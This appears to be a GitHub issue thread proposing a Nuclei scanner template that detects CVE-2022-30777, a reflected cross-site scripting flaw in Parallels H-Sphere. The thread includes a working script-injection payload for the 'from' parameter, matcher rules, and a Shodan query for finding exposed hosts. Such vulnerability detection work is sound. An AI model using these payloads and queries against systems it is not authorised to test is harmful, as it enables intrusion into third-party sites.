CVE-2022–30777

Question

CVE-2022–30777

3th1cyuk1 opened this issue 2 years ago · comments

Template Information:

Cross-site scripting (XSS) vulnerability in sites using outdated H-Sphere hosting allows remote attackers to inject arbitrary web script or HTML via the “from” parameter.

Nuclei Template:

id: CVE-2022-30777

info:
  name: Parallels H-Sphere
  author: 3th1c_yuk1
  severity: medium
  reference:
    - https://medium.com/@bhattronit96/cve-2022-30777-45725763ab59

requests:
  - method: GET
    path:
      - '{{BaseURL}}/index_en.php?from="><script>alert(1)</script>'
      - '{{BaseURL}}/index.php?from="><script>alert(1)</script>'

    matchers-condition: and
    matchers:

      - type: word
        words:
          - "<script>alert(1)</script>"

      - type: word
        part: header
        words:
          - "text/html"

Ritik Chaddha · Answer 1 · Thu Jun 30 2022 18:21:08 GMT+0800 (China Standard Time)

Hello @3th1cyuk1, To prevent getting FP, please update the template request and matcher as shown below. I have verified the template too.

requests:
  - method: GET
    path:
      - '{{BaseURL}}/index_en.php?from=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E'
      - '{{BaseURL}}/index.php?from=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:

      - type: word
        words:
          - '<TITLE>"><script>alert(1)</script>'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

Also, update the metadata header:

  metadata:
    verified: true
    shodan-query: title:"h-sphere"

Prince Chaddha · Answer 2 · Thu Jun 30 2022 20:38:52 GMT+0800 (China Standard Time)

Hi @3th1cyuk1, thank you for taking the time to create this issue and contributing to this project 🍻